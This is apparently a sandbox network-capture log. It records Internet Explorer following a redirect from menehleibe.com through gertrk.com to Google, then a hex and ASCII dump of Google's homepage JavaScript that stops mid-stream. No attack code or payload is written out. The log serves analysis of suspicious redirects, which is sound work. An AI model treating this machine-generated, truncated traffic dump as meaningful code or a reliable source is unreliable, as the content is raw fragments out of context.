Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: uclick=16bzxofy; expires=Wed, 15-Sep-2021 14:03:23 GMT; Max-Age=86400; path=/; secure; SameSite=none
Set-Cookie: uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c; expires=Wed, 15-Sep-2021 14:03:23 GMT; Max-Age=86400; path=/; secure; SameSite=none
Location: https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.com
Strict-Transport-Security: max-age=31536000
2021-09-14 14:03:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49744 | 168.119.139.96 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-14 14:03:23 UTC | 5 | OUT | GET /nlp/index.php?url_bnm_redirect=http://google.com HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://menehleibe.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: gertrk.com
Cookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
2021-09-14 14:03:23 UTC | 5 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 14 Sep 2021 14:03:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Strict-Transport-Security: max-age=31536000
2021-09-14 14:03:23 UTC | 6 | IN | Data Raw: 33 65 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 20 68 74 74 70 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 22 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 3e<meta http-equiv="refresh" content="0;URL= http://google.com">0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.6 | 49746 | 168.119.139.96 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-14 14:03:24 UTC | 6 | OUT | GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: gertrk.com
Connection: Keep-Alive
Cookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
2021-09-14 14:03:24 UTC | 6 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 14 Sep 2021 14:03:24 GMT
Content-Type: image/x-icon
Content-Length: 5638
Last-Modified: Thu, 30 Aug 2018 21:25:42 GMT
Connection: close
ETag: "5b8860d6-1606"
Strict-Transport-Security: max-age=31536000
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.6 | 49751 | 142.250.102.106 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-14 14:03:24 UTC | 12 | OUT | GET /?gws_rd=ssl HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: www.google.com
2021-09-14 14:03:24 UTC | 12 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Sep 2021 14:03:24 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: CONSENT=PENDING+509; expires=Fri, 01-Jan-2038 00:00:00 GMT; path=/; domain=.google.com; Secure
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
                                                                                                                                                                      Data Ascii: ype&&"clickmod"!=h.eventType||(c.preventDefault?c.preventDefault():c.returnValue=!1),(c=a.i(h))&&f){l.call(this,c,!1);return}}else{if((f=e.document)&&!f.createEvent&&f.createEventObject)try{var E=f.createEventObject(c)}catch(ja){E=c}else E=c;h.event=E;a.j
                                                                                                                                                                      2021-09-14 14:03:24 UTC26INData Raw: 31 30 34 0d 0a 56 28 61 29 3b 72 65 74 75 72 6e 20 64 7d 2c 56 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 61 2e 68 2e 63 6f 6e 63 61 74 28 61 2e 67 29 2c 64 3d 5b 5d 2c 63 3d 5b 5d 2c 66 3d 30 3b 66 3c 61 2e 67 2e 6c 65 6e 67 74 68 3b 2b 2b 66 29 7b 76 61 72 20 6c 3d 61 2e 67 5b 66 5d 3b 58 28 6c 2c 62 29 3f 28 64 2e 70 75 73 68 28 6c 29 2c 47 28 6c 29 29 3a 63 2e 70 75 73 68 28 6c 29 7d 66 6f 72 28 66 3d 30 3b 66 3c 61 2e 68 2e 6c 65 6e 67 74 68 3b 2b 2b 66 29 6c 3d 61 2e 68 5b 66 5d 2c 58 28 6c 2c 62 29 3f 64 2e 70 75 73 68 28 6c 29 3a 28 63 2e 70 75 73 68 28 6c 29 2c 55 28 61 2c 6c 29 29 3b 61 2e 67 3d 63 3b 61 2e 68 3d 64 7d 2c 55 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 64 3d 62 2e 67 3b 61 61 26 26 28 64 2e
                                                                                                                                                                      Data Ascii: 104V(a);return d},V=function(a){for(var b=a.h.concat(a.g),d=[],c=[],f=0;f<a.g.length;++f){var l=a.g[f];X(l,b)?(d.push(l),G(l)):c.push(l)}for(f=0;f<a.h.length;++f)l=a.h[f],X(l,b)?d.push(l):(c.push(l),U(a,l));a.g=c;a.h=d},U=function(a,b){var d=b.g;aa&&(d.
                                                                                                                                                                      2021-09-14 14:03:24 UTC26INData Raw: 38 30 30 30 0d 0a 6f 72 3d 22 70 6f 69 6e 74 65 72 22 29 3b 66 6f 72 28 64 3d 30 3b 64 3c 61 2e 73 2e 6c 65 6e 67 74 68 3b 2b 2b 64 29 62 2e 68 2e 70 75 73 68 28 61 2e 73 5b 64 5d 2e 63 61 6c 6c 28 6e 75 6c 6c 2c 62 2e 67 29 29 7d 2c 59 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 69 3d 62 3b 61 2e 6a 26 26 28 30 3c 61 2e 6a 2e 6c 65 6e 67 74 68 26 26 62 28 61 2e 6a 29 2c 61 2e 6a 3d 6e 75 6c 6c 29 7d 2c 58 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 62 2e 6c 65 6e 67 74 68 3b 2b 2b 64 29 69 66 28 62 5b 64 5d 2e 67 21 3d 61 2e 67 26 26 54 28 62 5b 64 5d 2e 67 2c 61 2e 67 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 54 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 3b 61 21 3d 62
                                                                                                                                                                      Data Ascii: 8000or="pointer");for(d=0;d<a.s.length;++d)b.h.push(a.s[d].call(null,b.g))},Y=function(a,b){a.i=b;a.j&&(0<a.j.length&&b(a.j),a.j=null)},X=function(a,b){for(var d=0;d<b.length;++d)if(b[d].g!=a.g&&T(b[d].g,a.g))return!0;return!1},T=function(a,b){for(;a!=b
                                                                                                                                                                      2021-09-14 14:03:24 UTC27INData Raw: 21 31 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 2e 65 72 64 3d 7b 73 70 3a 27 68 70 27 2c 6a 73 72 3a 30 2c 62 76 3a 38 31 2c 73 64 3a 74 72 75 65 7d 3b 7d 29 28 29 3b 3b 74 68 69 73 2e 67 62 61 72 5f 3d 7b 43 4f 4e 46 49 47 3a 5b 5b 5b 30 2c 22 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 2c 22 6f 67 2e 71 74 6d 2e 65 6e 5f 55 53 2e 61 75 53 72 46 57 2d 46 58 39 30 2e 4f 22 2c 22 63 6f 2e 75 6b 22 2c 22 65 6e 22 2c 22 35 33 38 22 2c 30 2c 5b 34 2c 32 2c 22 22 2c 22 22 2c 22 22 2c 22 33 39 35 33 37 32 39 35 34 22 2c 22 30 22 5d 2c 6e 75 6c 6c 2c 22 72 4b 74 41 59 66 75 69 48 73 72 6f 6b 67 58 6d 6b 49 69 67 44 51 22 2c 6e 75 6c 6c 2c 30 2c 22 6f 67 2e 71 74 6d 2e 77 74 58
                                                                                                                                                                      Data Ascii: !1};}).call(this);(function(){window.google.erd={sp:'hp',jsr:0,bv:81,sd:true};})();;this.gbar_={CONFIG:[[[0,"www.gstatic.com","og.qtm.en_US.auSrFW-FX90.O","co.uk","en","538",0,[4,2,"","","","395372954","0"],null,"rKtAYfuiHsrokgXmkIigDQ",null,0,"og.qtm.wtX
                                                                                                                                                                      2021-09-14 14:03:24 UTC29INData Raw: 25 32 36 75 74 6d 5f 6d 65 64 69 75 6d 25 33 44 6d 61 74 65 72 69 61 6c 2d 63 61 6c 6c 6f 75 74 25 32 36 75 74 6d 5f 63 61 6d 70 61 69 67 6e 25 33 44 73 65 61 72 63 68 25 32 36 75 74 6d 5f 63 6f 6e 74 65 6e 74 25 33 44 67 6f 6f 67 6c 65 5f 72 65 63 6f 6d 6d 65 6e 64 73 25 32 36 75 74 6d 5f 6b 65 79 77 6f 72 64 25 33 44 4f 4b 57 4d 5c 75 30 30 32 36 73 6f 75 72 63 65 3d 68 70 70 5c 75 30 30 32 36 69 64 3d 31 39 30 32 35 35 30 33 5c 75 30 30 32 36 63 74 3d 37 5c 75 30 30 32 36 75 73 67 3d 41 46 51 6a 43 4e 48 6b 6e 76 52 6b 6c 74 67 30 57 36 42 62 4d 37 32 49 70 5f 77 68 72 4f 31 7a 37 51 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 2c 6e 75 6c 6c 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30
                                                                                                                                                                      Data Ascii: %26utm_medium%3Dmaterial-callout%26utm_campaign%3Dsearch%26utm_content%3Dgoogle_recommends%26utm_keyword%3DOKWM\u0026source=hpp\u0026id=19025503\u0026ct=7\u0026usg=AFQjCNHknvRkltg0W6BbM72Ip_whrO1z7Q",null,null,null,null,null,1,null,0,0,1,0,0,0,null,null,0
                                                                                                                                                                      2021-09-14 14:03:24 UTC30INData Raw: 67 6c 65 2e 63 6f 6d 2f 75 72 6c 3f 71 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 68 72 6f 6d 65 2f 64 6f 77 6e 6c 6f 61 64 2d 63 68 72 6f 6d 65 2d 66 6f 72 2d 73 65 61 72 63 68 2f 25 33 46 62 72 61 6e 64 25 33 44 4f 4b 57 4d 25 32 36 75 74 6d 5f 73 6f 75 72 63 65 25 33 44 67 6f 6f 67 6c 65 2e 63 6f 6d 25 32 36 75 74 6d 5f 6d 65 64 69 75 6d 25 33 44 6d 61 74 65 72 69 61 6c 2d 63 61 6c 6c 6f 75 74 25 32 36 75 74 6d 5f 63 61 6d 70 61 69 67 6e 25 33 44 73 65 61 72 63 68 25 32 36 75 74 6d 5f 63 6f 6e 74 65 6e 74 25 33 44 67 6f 6f 67 6c 65 5f 72 65 63 6f 6d 6d 65 6e 64 73 25 32 36 75 74 6d 5f 6b 65 79 77 6f 72 64 25 33 44 4f 4b 57 4d 5c 75 30 30 32 36 73 6f 75 72 63 65 3d 68 70 70 5c 75 30 30 32 36 69 64 3d 31 39 30 32 35 35 30
                                                                                                                                                                      Data Ascii: gle.com/url?q=https://www.google.com/chrome/download-chrome-for-search/%3Fbrand%3DOKWM%26utm_source%3Dgoogle.com%26utm_medium%3Dmaterial-callout%26utm_campaign%3Dsearch%26utm_content%3Dgoogle_recommends%26utm_keyword%3DOKWM\u0026source=hpp\u0026id=1902550
                                                                                                                                                                      2021-09-14 14:03:24 UTC31INData Raw: 29 62 2e 63 61 6c 6c 28 63 2c 61 5b 64 5d 2c 64 2c 61 29 7d 3b 5f 2e 66 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 63 2c 64 2c 65 3d 31 3b 65 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 64 3d 61 72 67 75 6d 65 6e 74 73 5b 65 5d 3b 66 6f 72 28 63 20 69 6e 20 64 29 61 5b 63 5d 3d 64 5b 63 5d 3b 66 6f 72 28 76 61 72 20 66 3d 30 3b 66 3c 65 61 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 63 3d 65 61 5b 66 5d 2c 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 64 2c 63 29 26 26 28 61 5b 63 5d 3d 64 5b 63 5d 29 7d 7d 3b 0a 6a 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 61 3f
                                                                                                                                                                      Data Ascii: )b.call(c,a[d],d,a)};_.fa=function(a,b){for(var c,d,e=1;e<arguments.length;e++){d=arguments[e];for(c in d)a[c]=d[c];for(var f=0;f<ea.length;f++)c=ea[f],Object.prototype.hasOwnProperty.call(d,c)&&(a[c]=d[c])}};ja=function(a,b,c){return"object"===typeof a?
                                                                                                                                                                      2021-09-14 14:03:24 UTC32INData Raw: 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b 72 61 3d 71 61 28 74 68 69 73 29 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 62 29 61 3a 7b 76 61 72 20 63 3d 72 61 3b 61 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 2d 31 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 61 5b 64 5d 3b 69 66 28 21 28 65 20 69 6e 20 63 29 29 62 72 65 61 6b 20 61 3b 63 3d 63 5b 65 5d 7d 61 3d 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 3d 63 5b 61 5d 3b 62 3d 62 28 64 29 3b 62 21 3d 64 26 26 6e 75 6c 6c 21 3d 62 26 26 70 61 28 63 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 62 7d 29 7d 7d 3b 0a 73 61 28 22 53 79 6d 62 6f 6c 22
                                                                                                                                                                      Data Ascii: }throw Error("a");};ra=qa(this);sa=function(a,b){if(b)a:{var c=ra;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&pa(c,a,{configurable:!0,writable:!0,value:b})}};sa("Symbol"
                                                                                                                                                                      2021-09-14 14:03:24 UTC34INData Raw: 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 29 77 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 78 61 3b 61 3a 7b 76 61 72 20 79 61 3d 7b 61 3a 21 30 7d 2c 7a 61 3d 7b 7d 3b 74 72 79 7b 7a 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 79 61 3b 78 61 3d 7a 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 78 61 3d 21 31 7d 77 61 3d 78 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 21 3d 3d 62 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 64 60 22 2b 61 29 3b 72 65 74 75 72 6e 20 61 7d 3a 6e 75 6c 6c 7d 41 61 3d 77 61 3b 0a 5f 2e 71 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b
                                                                                                                                                                      Data Ascii: Object.setPrototypeOf)wa=Object.setPrototypeOf;else{var xa;a:{var ya={a:!0},za={};try{za.__proto__=ya;xa=za.a;break a}catch(a){}xa=!1}wa=xa?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError("d`"+a);return a}:null}Aa=wa;_.q=function(a,b){
                                                                                                                                                                      2021-09-14 14:03:24 UTC35INData Raw: 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 42 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 6a 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 42 61 28 6c 2c 66 29 3f 6c 5b 66 5d 5b 74 68 69 73 2e 6a 5d 3a 76 6f 69 64 20 30 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 42 61 28 6c 2c 66 29 26 26 42 61 28 6c
                                                                                                                                                                      Data Ascii: ],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!Ba(l,f))throw Error("f`"+l);l[f][this.j]=m;return this};k.prototype.get=function(l){return c(l)&&Ba(l,f)?l[f][this.j]:void 0};k.prototype.has=function(l){return c(l)&&Ba(l,f)&&Ba(l
                                                                                                                                                                      2021-09-14 14:03:24 UTC36INData Raw: 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 2e 6f 5b 6b 2e 69 64 5d 2c 6b 2e 58 61 2e 68 63 2e 6e 65 78 74 3d 6b 2e 58 61 2e 6e 65 78 74 2c 6b 2e 58 61 2e 6e 65 78 74 2e 68 63 3d 0a 6b 2e 58 61 2e 68 63 2c 6b 2e 58 61 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6f 3d 7b 7d 3b 74 68 69 73 2e 6a 3d 74 68 69 73 2e 6a 2e 68 63 3d 66 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 6b 29 2e 58 61 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e
                                                                                                                                                                      Data Ascii: x,1),k.list.length||delete this.o[k.id],k.Xa.hc.next=k.Xa.next,k.Xa.next.hc=k.Xa.hc,k.Xa.head=null,this.size--,!0):!1};c.prototype.clear=function(){this.o={};this.j=this.j.hc=f();this.size=0};c.prototype.has=function(k){return!!d(this,k).Xa};c.prototype.
                                                                                                                                                                      2021-09-14 14:03:24 UTC37INData Raw: 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 68 60 22 2b 63 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 73 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 61 3a 7b 76 61 72 20 64 3d 74 68 69 73 3b 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 64 3d 53 74 72 69 6e 67 28 64 29 29 3b 66 6f 72 28 76 61 72 20 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 30 3b 66 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 67 3d 64 5b 66 5d 3b 69 66 28 62 2e 63 61 6c 6c 28 63 2c 67 2c 66 2c 64 29 29 7b 62 3d 67 3b 62 72 65 61 6b 20 61 7d 7d 62 3d 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 62
                                                                                                                                                                      Data Ascii: f RegExp)throw new TypeError("h`"+c);return a+""};sa("Array.prototype.find",function(a){return a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var g=d[f];if(b.call(c,g,f,d)){b=g;break a}}b=void 0}return b
                                                                                                                                                                      2021-09-14 14:03:24 UTC39INData Raw: 75 72 6e 20 63 7d 29 7d 7d 29 3b 73 61 28 22 41 72 72 61 79 2e 66 72 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 3d 6e 75 6c 6c 21 3d 63 3f 63 3a 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 20 6b 7d 3b 76 61 72 20 65 3d 5b 5d 2c 66 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 66 29 7b 62 3d 66 2e 63 61 6c 6c 28 62 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 21 28 66 3d 62 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 65 2e 70 75 73 68 28 63 2e 63 61
                                                                                                                                                                      Data Ascii: urn c})}});sa("Array.from",function(a){return a?a:function(b,c,d){c=null!=c?c:function(k){return k};var e=[],f="undefined"!=typeof Symbol&&Symbol.iterator&&b[Symbol.iterator];if("function"==typeof f){b=f.call(b);for(var g=0;!(f=b.next()).done;)e.push(c.ca
                                                                                                                                                                      2021-09-14 14:03:24 UTC40INData Raw: 74 68 69 73 2e 6a 2e 76 61 6c 75 65 73 28 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 3d 62 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 73 3b 0a 62 2e 70 72 6f 74 6f 74 79 70 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 62 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 73 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 6a 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 63 2e 63 61 6c 6c 28 64 2c 66 2c 66 2c 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 62 7d 29 3b 73 61 28 22 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66
                                                                                                                                                                      Data Ascii: this.j.values()};b.prototype.keys=b.prototype.values;b.prototype[Symbol.iterator]=b.prototype.values;b.prototype.forEach=function(c,d){var e=this;this.j.forEach(function(f){return c.call(d,f,f,e)})};return b});sa("Object.entries",function(a){return a?a:f
                                                                                                                                                                      2021-09-14 14:03:24 UTC41INData Raw: 28 22 46 6c 6f 61 74 33 32 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 46 61 29 3b 73 61 28 22 46 6c 6f 61 74 36 34 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 46 61 29 3b 5f 2e 47 61 3d 5f 2e 47 61 7c 7c 7b 7d 3b 5f 2e 74 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 5f 2e 48 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 5f 2e 49 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 61 3b 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 62 26 26 6e 75 6c 6c 21 3d 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 62 7d 3b 5f 2e 4d 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28
                                                                                                                                                                      Data Ascii: ("Float32Array.prototype.fill",Fa);sa("Float64Array.prototype.fill",Fa);_.Ga=_.Ga||{};_.t=this||self;_.Ha=function(){};_.Ia=function(a){var b=typeof a;return"object"==b&&null!=a||"function"==b};_.Ma=function(a){return Object.prototype.hasOwnProperty.call(
                                                                                                                                                                      2021-09-14 14:03:24 UTC43INData Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 51 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 75 6c 6c 2c 63 3d 5f 2e 74 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 69 66 28 21 63 7c 7c 21 63 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 62 3b 74 72 79 7b 62 3d 63 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 61 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 50 61 2c 63 72 65 61 74 65 53 63 72 69 70 74 3a 50 61 2c 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 50 61 7d 29 7d 63 61 74 63 68 28 64 29 7b 5f 2e 74 2e 63 6f 6e 73 6f 6c 65 26 26 5f 2e 74 2e 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 64 2e 6d 65 73 73 61 67 65 29 7d 72 65 74 75 72 6e 20 62 7d 3b 0a 5f 2e 7a 28 5f 2e 61 61 2c 45 72 72 6f 72 29 3b
                                                                                                                                                                      Data Ascii: function(a){return a};_.Qa=function(a){var b=null,c=_.t.trustedTypes;if(!c||!c.createPolicy)return b;try{b=c.createPolicy(a,{createHTML:Pa,createScript:Pa,createScriptURL:Pa})}catch(d){_.t.console&&_.t.console.error(d.message)}return b};_.z(_.aa,Error);
                                                                                                                                                                      2021-09-14 14:03:24 UTC44INData Raw: 75 63 65 2e 63 61 6c 6c 28 61 2c 62 2c 63 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 63 3b 28 30 2c 5f 2e 54 61 29 28 61 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 66 29 7b 64 3d 62 2e 63 61 6c 6c 28 76 6f 69 64 20 30 2c 64 2c 65 2c 66 2c 61 29 7d 29 3b 72 65 74 75 72 6e 20 64 7d 3b 5f 2e 58 61 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6f 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6f 6d 65 2e 63 61 6c 6c 28 61 2c 62 2c 76 6f 69 64 20 30 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 6f 72 